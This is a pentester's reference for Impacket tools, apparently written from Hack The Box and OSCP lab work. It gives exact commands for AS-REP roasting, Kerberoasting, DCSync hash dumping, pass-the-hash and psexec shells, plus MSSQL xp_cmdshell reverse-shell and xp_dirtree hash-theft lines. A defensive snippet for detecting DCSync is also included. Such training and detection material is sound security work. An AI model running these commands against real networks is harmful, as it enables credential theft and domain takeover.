Impacket is a collection of Python tools for working with network protocols. In practice, for AD pentesting, I use maybe 6 of them constantly. This is a reference for those 6 — what they do, when to use them, and the exact commands I run.

Installed on Kali by default. Every tool is prefixed with impacket-.


impacket-GetNPUsers — AS-REP Roasting

What it does: Finds accounts with Kerberos pre-authentication disabled and dumps their AS-REP hashes. No credentials required — you just need a list of valid usernames.

When to use it: First thing I try on any AD box. Before brute-forcing, before anything else. If pre-auth is disabled on an account, you get the hash for free.

Basic Usage

# With a username list (no creds needed)
impacket-GetNPUsers DOMAIN.local/ -dc-ip $ip -usersfile users.txt -format hashcat -outputfile asrep.txt

# With valid creds (enumerates all vulnerable users automatically)
impacket-GetNPUsers DOMAIN.local/user:'password' -dc-ip $ip -request -format hashcat -outputfile asrep.txt

Key Flags

Flag               What it does
-usersfile         List of usernames to test (one per line)
-format hashcat    Output in hashcat format (mode 18200). Use -format john for john
-outputfile        Save hashes to file
-request           Actually request the TGT (needed when using creds)
-dc-ip             Target DC IP

Cracking the Hash

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Gotchas

  • No creds variant needs a username list. You have to enumerate usernames first — SMB null session, LDAP, kerbrute, whatever.
  • With creds variant finds all vulnerable accounts automatically. Don’t need a username list.
  • When saving hashes with echo, use single quotes. Double quotes corrupt the $ characters in the hash. Wasted time debugging this on Forest.

Where I Used It

  • Forest — AS-REP Roasted svc-alfresco with no creds. Got the hash, cracked it to s3rvice. That was the entire foothold.
  • Blackfield — Same thing. Harvested ~300 usernames from the profiles$ SMB share, fed them to GetNPUsers, got support account’s hash.

impacket-GetUserSPNs — Kerberoasting

What it does: Finds accounts with SPNs (Service Principal Names) set and requests their TGS tickets. The ticket is encrypted with the account’s password hash — crack the ticket, crack the password.

When to use it: Once you have any valid domain credentials. Any authenticated user can Kerberoast. This is always worth running.

Basic Usage

# Enumerate SPNs only
impacket-GetUserSPNs DOMAIN.local/user:'password' -dc-ip $ip

# Enumerate AND request tickets
impacket-GetUserSPNs DOMAIN.local/user:'password' -dc-ip $ip -request -outputfile kerberoast.txt

Key Flags

Flag           What it does
-request       Actually request the TGS tickets (without this, it just lists SPNs)
-outputfile    Save hashes to file
-dc-ip         Target DC IP

Cracking the Hash

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
# or
john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

Gotchas

  • You need valid creds first. Unlike AS-REP Roasting, Kerberoasting requires authentication.
  • Machine accounts and managed service accounts usually have random 128-char passwords. Focus on user accounts with SPNs — those are the ones with crackable passwords.
  • -request is easy to forget. Without it you just get a list of SPNs, not the actual hashes.

Where I Used It

  • Active — After getting SVC_TGS creds from GPP, Kerberoasted the Administrator account. SPN was active/CIFS:445. Cracked to Ticketmaster1968. Game over.

impacket-secretsdump — DCSync, SAM, NTDS.dit

What it does: Dumps credentials. This tool does multiple things depending on what you feed it:

  • Remote DCSync — mimics a domain controller replication request to pull all domain hashes
  • Local SAM dump — extracts hashes from SAM + SYSTEM registry hives
  • Local NTDS.dit dump — extracts hashes from the AD database file

Remote DCSync

# With password
impacket-secretsdump DOMAIN.local/user:'password'@$ip

# With NTLM hash (pass-the-hash)
impacket-secretsdump DOMAIN.local/user@$ip -hashes :NTLM_HASH

Requires DCSync rights — meaning Replicating Directory Changes + Replicating Directory Changes All. Domain Admins have this by default. On Forest, I granted these rights to svc-alfresco via WriteDACL abuse before running secretsdump.

Local NTDS.dit Dump

impacket-secretsdump -ntds ntds.dit -system system LOCAL

When you’ve already grabbed the NTDS.dit and SYSTEM hive files (via VSS snapshot, robocopy, whatever), this parses them offline. No network connection needed.

Key Flags

Flag                  What it does
-ntds                 Path to NTDS.dit file
-system               Path to SYSTEM registry hive
-hashes               Pass-the-hash authentication (:NTLM_HASH format — empty LM hash)
-just-dc-ntlm         Only dump NTLM hashes (faster, less noisy)
-just-dc-user USER    Only dump a specific user
LOCAL                 Parse local files instead of connecting remotely

Gotchas

  • Remote DCSync is loud. It generates specific Windows events (4662 with replication GUIDs). In a real engagement, SOC analysts (like former me) would flag this. Use -just-dc-ntlm or -just-dc-user to minimize noise.
  • The hash format in the output is LM:NTLM. For pass-the-hash you only need the NTLM part (after the second colon).
  • For local parsing, you need both NTDS.dit and SYSTEM. SYSTEM contains the boot key needed to decrypt the hashes.
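The "remote DCSync is loud" point above is worth seeing from the blue side. This is an added example, not Impacket's code: it scans constructed Security event records (flat dicts with the EventID, SubjectUserName and Properties fields a SIEM would extract) for 4662 events carrying the directory replication control-access GUIDs, and excludes the DC machine accounts (the DC01/DC02 names are assumptions) that replicate legitimately.

```python
"""Flag DCSync-style replication requests in Security event 4662 records.
Added example for this reference, not Impacket's code. The events below are
constructed samples as flat dicts; a SIEM would supply the same fields
(EventID, SubjectUserName, Properties) from parsed EVTX records."""
import re

# Control-access-right GUIDs written to the Properties field of event 4662 when
# an account replicates directory data (the rights a DCSync needs).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)
DC_NAMES = {"DC01", "DC02"}  # constructed (hypothetical) DC hostnames for the sample domain


def is_dc_account(subject, dc_names):
    """DCs replicate with each other legitimately; their machine accounts end in '$'."""
    return subject.endswith("$") and subject[:-1].upper() in dc_names


def find_dcsync_events(events, dc_names):
    """Return (subject, rights) for each 4662 event whose Properties carry a
    replication GUID and whose subject is not a known DC machine account.
    Even a single -just-dc-user request produces one such event."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = (g.lower() for g in GUID_RE.findall(ev.get("Properties", "")))
        rights = sorted({REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS})
        if rights and not is_dc_account(ev.get("SubjectUserName", ""), dc_names):
            hits.append((ev["SubjectUserName"], rights))
    return hits


# Constructed samples: DC-to-DC replication (benign), a user account replicating
# (suspicious), a 4662 with an unrelated made-up GUID, and a logon event (ignored).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco",
     "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{deadbeef-0000-4000-8000-000000000001}"},
    {"EventID": 4624, "SubjectUserName": "svc-alfresco", "Properties": ""},
]
```

Running find_dcsync_events(SAMPLE_EVENTS, DC_NAMES) flags only svc-alfresco with both Get-Changes rights; -just-dc-ntlm reduces volume but not the replication right that this check keys on.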

Where I Used It

  • Forest — Remote DCSync after granting svc-alfresco DCSync rights via WriteDACL. impacket-secretsdump htb.local/svc-alfresco:'s3rvice'@$ip pulled the Administrator NTLM hash.
  • Blackfield — Local NTDS.dit dump. Grabbed ntds.dit + SYSTEM via VSS snapshot and robocopy /b, then impacket-secretsdump -ntds ntds.dit -system system LOCAL. Got every hash in the domain.

impacket-psexec — Shell with Creds

What it does: Gives you a SYSTEM shell on a remote Windows box using valid credentials. Works over SMB (port 445). Uploads a service binary, creates a Windows service, starts it, gives you a shell, cleans up on exit.

Basic Usage

# With password
impacket-psexec DOMAIN.local/Administrator:'password'@$ip

# With NTLM hash
impacket-psexec DOMAIN.local/Administrator@$ip -hashes :NTLM_HASH

Key Flags

Flag          What it does
-hashes       Pass-the-hash (:NTLM_HASH format)
-target-ip    Useful when hostname resolution is weird

Gotchas

  • Requires admin-level creds and write access to ADMIN$ or C$ shares. Regular domain user creds won’t work.
  • Creates a Windows service — this is detectable. AV/EDR might flag it. For OSCP, doesn’t matter. For real engagements, consider alternatives like evil-winrm (WinRM, port 5985) or impacket-wmiexec.
  • The shell drops you as NT AUTHORITY\SYSTEM, not as the user you authenticated with.
  • If it hangs or fails, the service might not have been cleaned up. Subsequent attempts might fail until the service is removed.

Alternatives

Tool                Protocol        Stealth    Notes
impacket-psexec     SMB (445)       Low        Creates a service, SYSTEM shell
impacket-wmiexec    WMI (135)       Medium     No service creation, runs as the user
impacket-smbexec    SMB (445)       Medium     Uses a service but differently
evil-winrm          WinRM (5985)    Higher     PowerShell, needs WinRM enabled

Where I Used It

  • Active — impacket-psexec active.htb/Administrator:'Ticketmaster1968'@$ip for the final shell after Kerberoasting.

impacket-mssqlclient — MSSQL Access

What it does: Interactive MSSQL client. Connect to Microsoft SQL Server, run queries, enable and use xp_cmdshell for OS command execution.

Basic Usage

# Windows authentication
impacket-mssqlclient user:'password'@$ip -windows-auth

# SQL authentication (default)
impacket-mssqlclient user:'password'@$ip

Built-in Commands

Once connected, these are the key commands:

-- Check if you're sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin')

-- Enable xp_cmdshell (sysadmin only)
enable_xp_cmdshell

-- Run OS commands
xp_cmdshell 'whoami'

-- Reverse shell
xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'

-- Steal NTLMv2 hash (works even without sysadmin)
xp_dirtree '\\YOUR_IP\share'

Key Flags

Flag             What it does
-windows-auth    Use Windows/domain authentication instead of SQL auth
-port            Custom port if MSSQL isn't on 1433

Gotchas

  • -windows-auth matters. SQL auth and Windows auth are different. If one fails, try the other. On Querier, the connection failed without -windows-auth.
  • Passwords with $ need single quotes in bash. 'PcwTWTHRwryjc$c6' works. "PcwTWTHRwryjc$c6" doesn’t — bash interprets $c6 as a variable and corrupts the password.
  • enable_xp_cmdshell requires sysadmin role. If your user isn’t sysadmin, the command silently fails or errors. Use xp_dirtree + Responder to steal the service account’s NTLMv2 hash instead.
  • xp_dirtree + Responder is the fallback when xp_cmdshell is denied. The SQL server makes an SMB connection to your machine and Responder catches the hash. Hashcat mode 5600 for NTLMv2.

Where I Used It

  • Querier — Connected with VBA macro creds using -windows-auth. Reporting user couldn’t run xp_cmdshell, so I used xp_dirtree + Responder to steal the service account’s NTLMv2 hash. Cracked it, reconnected as sysadmin, enabled xp_cmdshell, got a shell.

impacket-smbclient — SMB File Access

What it does: Interactive SMB client for browsing and downloading files from shares. Similar to smbclient from Samba but uses Impacket’s authentication stack.

Basic Usage

# With password
impacket-smbclient DOMAIN.local/user:'password'@$ip

# With NTLM hash
impacket-smbclient DOMAIN.local/user@$ip -hashes :NTLM_HASH

# Null session
impacket-smbclient DOMAIN.local/''@$ip -no-pass

Key Commands

shares          # List available shares
use SHARE_NAME  # Connect to a share
ls              # List files
get file.txt    # Download a file
cd directory    # Change directory

Gotchas

  • I usually use smbclient (the Samba one) or nxc smb --shares for initial enumeration. Impacket’s smbclient is useful when I need Impacket’s authentication (pass-the-hash, Kerberos tickets).
  • For large file downloads, smbclient from Samba is more reliable. Impacket’s version can choke on big files.

Quick Reference — When to Use What

Situation                            Tool                                    Needs Creds?
Check for AS-REP Roastable users     impacket-GetNPUsers                     No (with user list)
Check for Kerberoastable users       impacket-GetUserSPNs                    Yes
Dump all domain hashes (DCSync)      impacket-secretsdump                    Yes (DCSync rights)
Parse NTDS.dit offline               impacket-secretsdump -ntds ... LOCAL    No
Get a SYSTEM shell                   impacket-psexec                         Yes (admin)
Connect to MSSQL                     impacket-mssqlclient                    Yes
Browse SMB shares                    impacket-smbclient                      Depends

My AD Recon Order

This is roughly the order I run these tools on an AD box:

  1. GetNPUsers — AS-REP Roast first. No creds needed. Free hashes if anything is vulnerable.
  2. GetUserSPNs — Kerberoast once I have any valid creds.
  3. secretsdump — DCSync if I get Domain Admin or DCSync rights.
  4. psexec — Final shell with the admin hash or password.

Everything else (mssqlclient, smbclient) gets used when the box calls for it.

The pattern across every AD box I’ve done: enumerate users → AS-REP Roast → get first creds → BloodHound → find the path → walk the path → secretsdump → psexec → done.